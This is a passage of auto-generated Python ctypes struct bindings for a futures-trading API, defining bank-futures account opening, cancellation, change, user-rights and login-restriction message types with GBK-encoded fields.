            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("UserID", UserID),
            ("Message", Message),
            ("DeviceID", DeviceID),
            ("BrokerIDByBank", BrokerIDByBank),
            ("OperNo", OperNo),
            ("ErrorMsg", ErrorMsg),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("RequestID", RequestID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if arg:
                setattr(self, field, arg)
class QryAccountregister(Struct):
    """Account-registration query filter (auto-generated binding)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("CurrencyID", c_char_Array_4),
    ]

    def __init__(self, BrokerID=None, AccountID=None, BankID=None, BankBranchID=None, CurrencyID=None):
        """GBK-encode every provided string argument; skip falsy values."""
        super().__init__()
        for field, arg in (
            ("BrokerID", BrokerID),
            ("AccountID", AccountID),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("CurrencyID", CurrencyID),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
class Accountregister(Struct):
    """Account-registration record (auto-generated binding)."""
    _fields_ = [
        ("TradeDay", c_char_Array_9),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BankAccount", c_char_Array_41),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("AccountID", c_char_Array_13),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustomerName", c_char_Array_51),
        ("CurrencyID", c_char_Array_4),
        ("OpenOrDestroy", c_char),
        ("RegDate", c_char_Array_9),
        ("OutDate", c_char_Array_9),
        ("TID", c_int),
        ("CustType", c_char),
        ("BankAccType", c_char),
        ("LongCustomerName", c_char_Array_161),
    ]

    def __init__(self, TradeDay=None, BankID=None, BankBranchID=None, BankAccount=None, BrokerID=None, BrokerBranchID=None, AccountID=None, IdCardType=None, IdentifiedCardNo=None, CustomerName=None, CurrencyID=None, OpenOrDestroy=None, RegDate=None, OutDate=None, TID=None, CustType=None, BankAccType=None, LongCustomerName=None):
        """GBK-encode string args; store TID as-is; skip falsy values."""
        super().__init__()
        for field, arg in (
            ("TradeDay", TradeDay),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BankAccount", BankAccount),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("AccountID", AccountID),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("CustomerName", CustomerName),
            ("CurrencyID", CurrencyID),
            ("OpenOrDestroy", OpenOrDestroy),
            ("RegDate", RegDate),
            ("OutDate", OutDate),
            ("CustType", CustType),
            ("BankAccType", BankAccType),
            ("LongCustomerName", LongCustomerName),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        if TID:
            self.TID = TID
class OpenAccount(Struct):
    """Bank-futures account-opening request (auto-generated binding)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("CashExchangeCode", c_char),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("TID", c_int),
        ("UserID", c_char_Array_16),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("LongCustomerName", c_char_Array_161),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender),
            ("CountryCode", CountryCode),
            ("CustType", CustType),
            ("Address", Address),
            ("ZipCode", ZipCode),
            ("Telephone", Telephone),
            ("MobilePhone", MobilePhone),
            ("Fax", Fax),
            ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus),
            ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord),
            ("AccountID", AccountID),
            ("Password", Password),
            ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID),
            ("CashExchangeCode", CashExchangeCode),
            ("Digest", Digest),
            ("BankAccType", BankAccType),
            ("DeviceID", DeviceID),
            ("BankSecuAccType", BankSecuAccType),
            ("BrokerIDByBank", BrokerIDByBank),
            ("BankSecuAcc", BankSecuAcc),
            ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag),
            ("OperNo", OperNo),
            ("UserID", UserID),
            ("ErrorMsg", ErrorMsg),
            ("LongCustomerName", LongCustomerName),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if arg:
                setattr(self, field, arg)
class CancelAccount(Struct):
    """ctypes struct for the CancelAccount message.

    Truthy string arguments are GBK-encoded into the fixed-size char-array
    fields; truthy numeric arguments are stored as-is. Falsy arguments are
    skipped, leaving the ctypes zero defaults in place.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("CashExchangeCode", c_char),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("TID", c_int),
        ("UserID", c_char_Array_16),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, CashExchangeCode=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, TID=None, UserID=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
        """Populate only the fields whose argument is truthy."""
        super().__init__()
        # Text fields: encode to GBK before storing in the char arrays.
        for name, text in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender),
            ("CountryCode", CountryCode),
            ("CustType", CustType),
            ("Address", Address),
            ("ZipCode", ZipCode),
            ("Telephone", Telephone),
            ("MobilePhone", MobilePhone),
            ("Fax", Fax),
            ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus),
            ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord),
            ("AccountID", AccountID),
            ("Password", Password),
            ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID),
            ("CashExchangeCode", CashExchangeCode),
            ("Digest", Digest),
            ("BankAccType", BankAccType),
            ("DeviceID", DeviceID),
            ("BankSecuAccType", BankSecuAccType),
            ("BrokerIDByBank", BrokerIDByBank),
            ("BankSecuAcc", BankSecuAcc),
            ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag),
            ("OperNo", OperNo),
            ("UserID", UserID),
            ("ErrorMsg", ErrorMsg),
            ("LongCustomerName", LongCustomerName),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        # Numeric fields: stored directly, no encoding.
        for name, number in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if number:
                setattr(self, name, number)
class ChangeAccount(Struct):
    """ctypes struct for the ChangeAccount message.

    Truthy string arguments are GBK-encoded into the fixed-size char-array
    fields; truthy numeric arguments are stored as-is. Falsy arguments are
    skipped, leaving the ctypes zero defaults in place.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("NewBankAccount", c_char_Array_41),
        ("NewBankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("BankAccType", c_char),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("TID", c_int),
        ("Digest", c_char_Array_36),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, NewBankAccount=None, NewBankPassWord=None, AccountID=None, Password=None, BankAccType=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, BrokerIDByBank=None, BankPwdFlag=None, SecuPwdFlag=None, TID=None, Digest=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
        """Populate only the fields whose argument is truthy."""
        super().__init__()
        # Text fields: encode to GBK before storing in the char arrays.
        for name, text in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender),
            ("CountryCode", CountryCode),
            ("CustType", CustType),
            ("Address", Address),
            ("ZipCode", ZipCode),
            ("Telephone", Telephone),
            ("MobilePhone", MobilePhone),
            ("Fax", Fax),
            ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus),
            ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord),
            ("NewBankAccount", NewBankAccount),
            ("NewBankPassWord", NewBankPassWord),
            ("AccountID", AccountID),
            ("Password", Password),
            ("BankAccType", BankAccType),
            ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID),
            ("BrokerIDByBank", BrokerIDByBank),
            ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag),
            ("Digest", Digest),
            ("ErrorMsg", ErrorMsg),
            ("LongCustomerName", LongCustomerName),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        # Numeric fields: stored directly, no encoding.
        for name, number in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if number:
                setattr(self, name, number)
class SecAgentACIDMap(Struct):
    """ctypes struct for the SecAgentACIDMap record; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("BrokerSecAgentID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, UserID=None, AccountID=None, CurrencyID=None, BrokerSecAgentID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
            ("BrokerSecAgentID", BrokerSecAgentID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QrySecAgentACIDMap(Struct):
    """ctypes struct for the QrySecAgentACIDMap query; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, UserID=None, AccountID=None, CurrencyID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class UserRightsAssign(Struct):
    """ctypes struct for the UserRightsAssign record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("DRIdentityID", c_int),
    ]
    def __init__(self, BrokerID=None, UserID=None, DRIdentityID=None):
        """Store truthy arguments: strings GBK-encoded, the ID as-is."""
        super().__init__()
        for name, text in (("BrokerID", BrokerID), ("UserID", UserID)):
            if text:
                setattr(self, name, text.encode("GBK"))
        if DRIdentityID:
            self.DRIdentityID = DRIdentityID
class BrokerUserRightAssign(Struct):
    """ctypes struct for the BrokerUserRightAssign record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("DRIdentityID", c_int),
        ("Tradeable", c_int),
    ]
    def __init__(self, BrokerID=None, DRIdentityID=None, Tradeable=None):
        """Store truthy arguments: BrokerID GBK-encoded, ints as-is."""
        super().__init__()
        if BrokerID:
            self.BrokerID = BrokerID.encode("GBK")
        for name, number in (("DRIdentityID", DRIdentityID), ("Tradeable", Tradeable)):
            if number:
                setattr(self, name, number)
class DRTransfer(Struct):
    """ctypes struct for the DRTransfer record."""
    _fields_ = [
        ("OrigDRIdentityID", c_int),
        ("DestDRIdentityID", c_int),
        ("OrigBrokerID", c_char_Array_11),
        ("DestBrokerID", c_char_Array_11),
    ]
    def __init__(self, OrigDRIdentityID=None, DestDRIdentityID=None, OrigBrokerID=None, DestBrokerID=None):
        """Store truthy arguments: IDs as-is, broker strings GBK-encoded."""
        super().__init__()
        for name, number in (
            ("OrigDRIdentityID", OrigDRIdentityID),
            ("DestDRIdentityID", DestDRIdentityID),
        ):
            if number:
                setattr(self, name, number)
        for name, text in (
            ("OrigBrokerID", OrigBrokerID),
            ("DestBrokerID", DestBrokerID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class FensUserInfo(Struct):
    """ctypes struct for the FensUserInfo record; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("LoginMode", c_char),
    ]
    def __init__(self, BrokerID=None, UserID=None, LoginMode=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("LoginMode", LoginMode),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class CurrTransferIdentity(Struct):
    """ctypes struct for the CurrTransferIdentity record."""
    _fields_ = [
        ("IdentityID", c_int),
    ]
    def __init__(self, IdentityID=None):
        """Store IdentityID when truthy; otherwise keep the zero default."""
        super().__init__()
        if IdentityID:
            setattr(self, "IdentityID", IdentityID)
class LoginForbiddenUser(Struct):
    """ctypes struct for the LoginForbiddenUser record; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("IPAddress", c_char_Array_16),
    ]
    def __init__(self, BrokerID=None, UserID=None, IPAddress=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("IPAddress", IPAddress),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class QryLoginForbiddenUser(Struct):
    """ctypes struct for the QryLoginForbiddenUser query; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]
    def __init__(self, BrokerID=None, UserID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (("BrokerID", BrokerID), ("UserID", UserID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class MulticastGroupInfo(Struct):
    """ctypes struct for the MulticastGroupInfo record."""
    _fields_ = [
        ("GroupIP", c_char_Array_16),
        ("GroupPort", c_int),
        ("SourceIP", c_char_Array_16),
    ]
    def __init__(self, GroupIP=None, GroupPort=None, SourceIP=None):
        """Store truthy arguments: IP strings GBK-encoded, the port as-is."""
        super().__init__()
        for name, text in (("GroupIP", GroupIP), ("SourceIP", SourceIP)):
            if text:
                setattr(self, name, text.encode("GBK"))
        if GroupPort:
            self.GroupPort = GroupPort
class TradingAccountReserve(Struct):
    """ctypes struct for the TradingAccountReserve record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("Reserve", c_double),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, AccountID=None, Reserve=None, CurrencyID=None):
        """Store truthy arguments: strings GBK-encoded, Reserve as-is."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        if Reserve:
            self.Reserve = Reserve
class QryLoginForbiddenIP(Struct):
    """ctypes struct for the QryLoginForbiddenIP query."""
    _fields_ = [
        ("IPAddress", c_char_Array_16),
    ]
    def __init__(self, IPAddress=None):
        """GBK-encode and store IPAddress when truthy; skip otherwise."""
        super().__init__()
        if IPAddress:
            setattr(self, "IPAddress", IPAddress.encode("GBK"))
class QryIPList(Struct):
    """ctypes struct for the QryIPList query."""
    _fields_ = [
        ("IPAddress", c_char_Array_16),
    ]
    def __init__(self, IPAddress=None):
        """GBK-encode and store IPAddress when truthy; skip otherwise."""
        super().__init__()
        if IPAddress:
            setattr(self, "IPAddress", IPAddress.encode("GBK"))
class QryUserRightsAssign(Struct):
    """ctypes struct for the QryUserRightsAssign query; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]
    def __init__(self, BrokerID=None, UserID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (("BrokerID", BrokerID), ("UserID", UserID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class ReserveOpenAccountConfirm(Struct):
    """ctypes struct for the ReserveOpenAccountConfirm message.

    Truthy string arguments are GBK-encoded into the fixed-size char-array
    fields; truthy numeric arguments are stored as-is. Falsy arguments are
    skipped, leaving the ctypes zero defaults in place.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_161),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("TID", c_int),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("BankReserveOpenSeq", c_char_Array_13),
        ("BookDate", c_char_Array_9),
        ("BookPsw", c_char_Array_41),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, BrokerIDByBank=None, TID=None, AccountID=None, Password=None, BankReserveOpenSeq=None, BookDate=None, BookPsw=None, ErrorID=None, ErrorMsg=None):
        """Populate only the fields whose argument is truthy."""
        super().__init__()
        # Text fields: encode to GBK before storing in the char arrays.
        for name, text in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender),
            ("CountryCode", CountryCode),
            ("CustType", CustType),
            ("Address", Address),
            ("ZipCode", ZipCode),
            ("Telephone", Telephone),
            ("MobilePhone", MobilePhone),
            ("Fax", Fax),
            ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus),
            ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord),
            ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID),
            ("Digest", Digest),
            ("BankAccType", BankAccType),
            ("BrokerIDByBank", BrokerIDByBank),
            ("AccountID", AccountID),
            ("Password", Password),
            ("BankReserveOpenSeq", BankReserveOpenSeq),
            ("BookDate", BookDate),
            ("BookPsw", BookPsw),
            ("ErrorMsg", ErrorMsg),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        # Numeric fields: stored directly, no encoding.
        for name, number in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if number:
                setattr(self, name, number)
class ReserveOpenAccount(Struct):
    """ctypes struct for the ReserveOpenAccount message.

    Truthy string arguments are GBK-encoded into the fixed-size char-array
    fields; truthy numeric arguments are stored as-is. Falsy arguments are
    skipped, leaving the ctypes zero defaults in place.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_161),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("Gender", c_char),
        ("CountryCode", c_char_Array_21),
        ("CustType", c_char),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Telephone", c_char_Array_41),
        ("MobilePhone", c_char_Array_21),
        ("Fax", c_char_Array_41),
        ("EMail", c_char_Array_41),
        ("MoneyAccountStatus", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("TID", c_int),
        ("ReserveOpenAccStas", c_char),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, BrokerIDByBank=None, TID=None, ReserveOpenAccStas=None, ErrorID=None, ErrorMsg=None):
        """Populate only the fields whose argument is truthy."""
        super().__init__()
        # Text fields: encode to GBK before storing in the char arrays.
        for name, text in (
